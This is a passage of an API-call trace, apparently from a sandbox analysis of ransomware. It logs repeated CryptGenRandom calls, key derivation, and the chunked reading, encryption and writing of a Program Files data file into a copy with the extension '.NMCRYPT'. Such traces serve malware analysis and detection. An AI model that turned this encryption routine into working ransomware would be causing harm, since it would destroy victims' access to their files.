pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.615] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.616] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.616] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.616] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0144.616] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.616] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0144.616] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.616] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.617] wcslen (_String="\\\\?\\") returned 0x4 [0144.617] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0144.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0144.626] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=491472) returned 1 [0144.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.632] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.632] GetLastError () returned 0x0 [0144.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.636] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.636] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.636] GetLastError () returned 0x0 [0144.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.636] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.636] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.636] GetLastError () returned 0x0 [0144.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.636] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.636] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.636] GetLastError () returned 0x0 [0144.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.636] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.636] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.636] GetLastError () returned 0x0 [0144.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.636] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.637] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.637] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.637] GetLastError () returned 0x0 [0144.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 